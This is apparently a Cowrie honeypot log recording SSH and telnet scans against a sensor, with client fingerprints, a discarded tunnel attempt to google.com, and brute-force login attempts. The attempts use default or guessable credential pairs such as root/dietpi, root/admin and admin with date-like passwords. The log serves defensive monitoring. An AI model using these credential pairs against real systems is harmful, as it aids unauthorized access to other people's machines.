{"eventid":"cowrie.client.kex","hassh":"14b2ddda386a4d1006108ccd231b42fc","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 14b2ddda386a4d1006108ccd231b42fc","sensor":"my-vps","timestamp":"2025-08-28T16:44:22.213052Z","src_ip":"175.110.65.134","session":"380a7ad6c9f6"}
{"eventid":"cowrie.login.success","username":"root","password":"dietpi","message":"login attempt [root/dietpi] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:44:22.313489Z","src_ip":"175.110.65.134","session":"380a7ad6c9f6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"google.com","dst_port":80,"src_ip":"175.110.65.134","src_port":8082,"message":"direct-tcp connection request to google.com:80 from 127.0.0.1:8082","sensor":"my-vps","timestamp":"2025-08-28T16:44:22.341952Z","session":"380a7ad6c9f6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"google.com","dst_port":80,"data":"b'GET / HTTP/1.1\\r\\nUser-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to google.com:80 with data b'GET / HTTP/1.1\\r\\nUser-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T16:44:22.367263Z","src_ip":"175.110.65.134","session":"380a7ad6c9f6"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:44:22.393848Z","src_ip":"175.110.65.134","session":"380a7ad6c9f6"}
{"eventid":"cowrie.session.closed","duration":12.747037887573242,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:44:25.362832Z","src_ip":"212.227.235.229","session":"eff8f469e0b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50189,"dst_ip":"1.2.3.4","dst_port":23,"session":"4f8a4d2c37ae","protocol":"telnet","message":"New connection: 212.227.235.229:50189 (1.2.3.4:23) [session: 4f8a4d2c37ae]","sensor":"my-vps","timestamp":"2025-08-28T16:44:25.607789Z"}
{"eventid":"cowrie.session.closed","duration":12.767778873443604,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:44:38.375489Z","src_ip":"212.227.235.229","session":"4f8a4d2c37ae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50529,"dst_ip":"1.2.3.4","dst_port":23,"session":"c00ef4f64513","protocol":"telnet","message":"New connection: 212.227.235.229:50529 (1.2.3.4:23) [session: c00ef4f64513]","sensor":"my-vps","timestamp":"2025-08-28T16:44:38.637904Z"}
{"eventid":"cowrie.session.connect","src_ip":"198.235.24.172","src_port":64064,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb4946586c5b","protocol":"ssh","message":"New connection: 198.235.24.172:64064 (1.2.3.4:22) [session: bb4946586c5b]","sensor":"my-vps","timestamp":"2025-08-28T16:44:49.250974Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-28T16:44:49.915613Z","src_ip":"198.235.24.172","session":"bb4946586c5b"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-28T16:44:51.100200Z","src_ip":"198.235.24.172","session":"bb4946586c5b"}
{"eventid":"cowrie.session.closed","duration":14.260289430618286,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:44:52.898121Z","src_ip":"212.227.235.229","session":"c00ef4f64513"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50848,"dst_ip":"1.2.3.4","dst_port":23,"session":"f0e27ed7066e","protocol":"telnet","message":"New connection: 212.227.235.229:50848 (1.2.3.4:23) [session: f0e27ed7066e]","sensor":"my-vps","timestamp":"2025-08-28T16:44:52.899072Z"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:44:57.153727Z","src_ip":"198.235.24.172","session":"bb4946586c5b"}
{"eventid":"cowrie.session.closed","duration":11.465347051620483,"message":"Connection lost after 11 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:45:04.364366Z","src_ip":"212.227.235.229","session":"f0e27ed7066e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51187,"dst_ip":"1.2.3.4","dst_port":23,"session":"e3c93657df0b","protocol":"telnet","message":"New connection: 212.227.235.229:51187 (1.2.3.4:23) [session: e3c93657df0b]","sensor":"my-vps","timestamp":"2025-08-28T16:45:04.609912Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34540,"dst_ip":"1.2.3.4","dst_port":22,"session":"56ffdca30860","protocol":"ssh","message":"New connection: 212.227.235.229:34540 (1.2.3.4:22) [session: 56ffdca30860]","sensor":"my-vps","timestamp":"2025-08-28T16:45:15.508504Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:45:15.509787Z","src_ip":"212.227.235.229","session":"56ffdca30860"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T16:45:15.596629Z","src_ip":"212.227.235.229","session":"56ffdca30860"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"4d:5e:d5:b2:e6:a4:cd:69:db:d7:71:8c:ac:b8:0e:57","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7+jdGkKI24VohZOal0YS5ReoAW0DrfX27/1lArnv3Fhy9YR5juzQyfMh8Wn6mvtDj0vI4xNB3Nbn2W2i08PQy+uyBW1xHuP+5CHFgG00hTlu8ofri5JnK0cbyPH0PqAiua96tXUVKL7K2obXoGiqWZ5b+N6iVyFrJ1//SI06Jr252snOyqRyd8MMb/PKZxuQ6Danul4+ZUCneoWWy2dHCmn4lVxn4lK5hYlAKbrrZ0HYAnDyNR5oP2gnLtLtRCAeYui9LXvlhTifHuDMo2MpPPH8sQ1ss14rab1JhL7TXVGZRgc9C7ko8yBR0MEWKnF84i9H/Uo+gE+VRcgJBQyzd","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 4d:5e:d5:b2:e6:a4:cd:69:db:d7:71:8c:ac:b8:0e:57","sensor":"my-vps","timestamp":"2025-08-28T16:45:15.770429Z","src_ip":"212.227.235.229","session":"56ffdca30860"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"4d:5e:d5:b2:e6:a4:cd:69:db:d7:71:8c:ac:b8:0e:57","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7+jdGkKI24VohZOal0YS5ReoAW0DrfX27/1lArnv3Fhy9YR5juzQyfMh8Wn6mvtDj0vI4xNB3Nbn2W2i08PQy+uyBW1xHuP+5CHFgG00hTlu8ofri5JnK0cbyPH0PqAiua96tXUVKL7K2obXoGiqWZ5b+N6iVyFrJ1//SI06Jr252snOyqRyd8MMb/PKZxuQ6Danul4+ZUCneoWWy2dHCmn4lVxn4lK5hYlAKbrrZ0HYAnDyNR5oP2gnLtLtRCAeYui9LXvlhTifHuDMo2MpPPH8sQ1ss14rab1JhL7TXVGZRgc9C7ko8yBR0MEWKnF84i9H/Uo+gE+VRcgJBQyzd","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:45:15.771157Z","src_ip":"212.227.235.229","session":"56ffdca30860"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"4d:5e:d5:b2:e6:a4:cd:69:db:d7:71:8c:ac:b8:0e:57","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7+jdGkKI24VohZOal0YS5ReoAW0DrfX27/1lArnv3Fhy9YR5juzQyfMh8Wn6mvtDj0vI4xNB3Nbn2W2i08PQy+uyBW1xHuP+5CHFgG00hTlu8ofri5JnK0cbyPH0PqAiua96tXUVKL7K2obXoGiqWZ5b+N6iVyFrJ1//SI06Jr252snOyqRyd8MMb/PKZxuQ6Danul4+ZUCneoWWy2dHCmn4lVxn4lK5hYlAKbrrZ0HYAnDyNR5oP2gnLtLtRCAeYui9LXvlhTifHuDMo2MpPPH8sQ1ss14rab1JhL7TXVGZRgc9C7ko8yBR0MEWKnF84i9H/Uo+gE+VRcgJBQyzd","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 4d:5e:d5:b2:e6:a4:cd:69:db:d7:71:8c:ac:b8:0e:57","sensor":"my-vps","timestamp":"2025-08-28T16:45:15.862461Z","src_ip":"212.227.235.229","session":"56ffdca30860"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"4d:5e:d5:b2:e6:a4:cd:69:db:d7:71:8c:ac:b8:0e:57","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7+jdGkKI24VohZOal0YS5ReoAW0DrfX27/1lArnv3Fhy9YR5juzQyfMh8Wn6mvtDj0vI4xNB3Nbn2W2i08PQy+uyBW1xHuP+5CHFgG00hTlu8ofri5JnK0cbyPH0PqAiua96tXUVKL7K2obXoGiqWZ5b+N6iVyFrJ1//SI06Jr252snOyqRyd8MMb/PKZxuQ6Danul4+ZUCneoWWy2dHCmn4lVxn4lK5hYlAKbrrZ0HYAnDyNR5oP2gnLtLtRCAeYui9LXvlhTifHuDMo2MpPPH8sQ1ss14rab1JhL7TXVGZRgc9C7ko8yBR0MEWKnF84i9H/Uo+gE+VRcgJBQyzd","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:45:15.863142Z","src_ip":"212.227.235.229","session":"56ffdca30860"}
{"eventid":"cowrie.session.closed","duration":12.69631314277649,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:45:17.306156Z","src_ip":"212.227.235.229","session":"e3c93657df0b"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:45:25.508388Z","src_ip":"212.227.235.229","session":"56ffdca30860"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51206,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a46eecb7578","protocol":"ssh","message":"New connection: 217.72.205.35:51206 (1.2.3.4:22) [session: 8a46eecb7578]","sensor":"my-vps","timestamp":"2025-08-28T16:47:06.135219Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:47:06.136348Z","src_ip":"217.72.205.35","session":"8a46eecb7578"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":27762,"dst_ip":"1.2.3.4","dst_port":22,"session":"16550470bf9a","protocol":"ssh","message":"New connection: 212.227.235.229:27762 (1.2.3.4:22) [session: 16550470bf9a]","sensor":"my-vps","timestamp":"2025-08-28T16:47:12.568742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T16:47:12.569721Z","src_ip":"212.227.235.229","session":"16550470bf9a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T16:47:12.673927Z","src_ip":"212.227.235.229","session":"16550470bf9a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29051980","message":"login attempt [admin/29051980] failed","sensor":"my-vps","timestamp":"2025-08-28T16:47:13.174313Z","src_ip":"212.227.235.229","session":"16550470bf9a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29041991","message":"login attempt [admin/29041991] failed","sensor":"my-vps","timestamp":"2025-08-28T16:47:14.281019Z","src_ip":"212.227.235.229","session":"16550470bf9a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29031995","message":"login attempt [admin/29031995] failed","sensor":"my-vps","timestamp":"2025-08-28T16:47:15.389242Z","src_ip":"212.227.235.229","session":"16550470bf9a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"28101987","message":"login attempt [admin/28101987] failed","sensor":"my-vps","timestamp":"2025-08-28T16:47:16.495734Z","src_ip":"212.227.235.229","session":"16550470bf9a"}
{"eventid":"cowrie.login.failed","username":"admin","password":"28061992","message":"login attempt [admin/28061992] failed","sensor":"my-vps","timestamp":"2025-08-28T16:47:17.602472Z","src_ip":"212.227.235.229","session":"16550470bf9a"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:47:18.708669Z","src_ip":"212.227.235.229","session":"16550470bf9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":1300,"dst_ip":"1.2.3.4","dst_port":22,"session":"c146cbd42107","protocol":"ssh","message":"New connection: 212.227.125.160:1300 (1.2.3.4:22) [session: c146cbd42107]","sensor":"my-vps","timestamp":"2025-08-28T16:47:33.781401Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T16:47:33.782317Z","src_ip":"212.227.125.160","session":"c146cbd42107"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T16:47:34.158366Z","src_ip":"212.227.125.160","session":"c146cbd42107"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T16:47:34.573974Z","src_ip":"212.227.125.160","session":"c146cbd42107"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:47:35.657153Z","src_ip":"212.227.125.160","session":"c146cbd42107"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36133,"dst_ip":"1.2.3.4","dst_port":23,"session":"bc9f408d5a28","protocol":"telnet","message":"New connection: 212.227.235.229:36133 (1.2.3.4:23) [session: bc9f408d5a28]","sensor":"my-vps","timestamp":"2025-08-28T16:48:07.673524Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49028,"dst_ip":"1.2.3.4","dst_port":23,"session":"0f013002b2ac","protocol":"telnet","message":"New connection: 212.227.235.229:49028 (1.2.3.4:23) [session: 0f013002b2ac]","sensor":"my-vps","timestamp":"2025-08-28T16:48:17.177675Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:48:17.386436Z","src_ip":"212.227.235.229","session":"0f013002b2ac"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:48:17.405025Z","src_ip":"212.227.235.229","session":"0f013002b2ac"}
{"eventid":"cowrie.session.closed","duration":22.841384410858154,"message":"Connection lost after 22 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:48:30.514822Z","src_ip":"212.227.235.229","session":"bc9f408d5a28"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46392,"dst_ip":"1.2.3.4","dst_port":22,"session":"0b149961ccc6","protocol":"ssh","message":"New connection: 212.227.235.229:46392 (1.2.3.4:22) [session: 0b149961ccc6]","sensor":"my-vps","timestamp":"2025-08-28T16:49:03.661198Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:49:03.662518Z","src_ip":"212.227.235.229","session":"0b149961ccc6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46706,"dst_ip":"1.2.3.4","dst_port":22,"session":"f9dde896087f","protocol":"ssh","message":"New connection: 212.227.235.229:46706 (1.2.3.4:22) [session: f9dde896087f]","sensor":"my-vps","timestamp":"2025-08-28T16:49:03.837449Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:49:03.839038Z","src_ip":"212.227.235.229","session":"f9dde896087f"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T16:49:03.997470Z","src_ip":"212.227.235.229","session":"f9dde896087f"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:49:04.472339Z","src_ip":"212.227.235.229","session":"f9dde896087f"}
